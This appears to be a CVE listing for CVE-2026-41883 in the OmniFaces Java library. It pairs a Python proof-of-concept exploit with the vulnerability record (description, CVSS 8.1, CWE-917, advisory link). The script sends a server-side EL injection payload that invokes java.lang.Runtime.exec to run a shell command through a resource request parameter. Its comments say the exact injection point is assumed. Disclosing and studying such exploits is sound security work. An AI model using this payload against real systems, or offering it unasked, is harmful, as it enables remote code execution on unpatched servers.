CVE-2026-41883

import requests """ Proof of Concept for CVE-2026-41883 (OmniFaces EL Injection) Target: OmniFaces application with wildcard CDN mapping enabled. Description: This script sends a malicious request containing an EL expression to execute a system command (e.g., 'touch /tmp/pwned' on Linux). """ target_url = "http://localhost:8080/app/javax.faces.resource/fake.js.xhtml" # EL payload to execute a shell command # Example: Creating a file to prove execution payload = "#{request.servletContext.getClassLoader().loadClass('java.lang.Runtime').getRuntime().exec('touch /tmp/pwned')}" # Parameters typically used in CDN resource handling # 'ln' often matches the library name mapping, 'r' or resource identifier might hold the injection point # Depending on the exact implementation, the injection point might be in the path or query parameter. # Here we assume the resource identifier is vulnerable. params = { "ln": "*", # Wildcard library mapping "r": payload # Injecting EL into the resource name } try: response = requests.get(target_url, params=params) print(f"[+] Request sent to: {response.url}") print(f"[+] Status Code: {response.status_code}") if response.status_code == 200: print("[+] Request successful. Check if the command was executed on the target.") else: print("[-] Request failed or server returned an error.") except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-41883", "sourceIdentifier": "[email protected]", "published": "2026-05-08T16:16:11.760", "lastModified": "2026-05-08T16:16:11.760", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "OmniFaces is a utility library for Faces. Prior to versions 1.14.2, 2.7.32, 3.14.16, 4.7.5, and 5.2.3, there is a server-side EL injection leading to Remote Code Execution (RCE). This affects applications that use CDNResourceHandler with a wildcard CDN mapping (e.g. libraryName:*=https://cdn.example.com/*). An attacker can craft a resource request URL containing an EL expression in the resource name, which is evaluated server-side. This issue has been patched in versions 1.14.2, 2.7.32, 3.14.16, 4.7.5, and 5.2.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-917"}]}], "references": [{"url": "https://github.com/omnifaces/omnifaces/security/advisories/GHSA-vp6r-9m58-5xv8", "source": "[email protected]"}]}}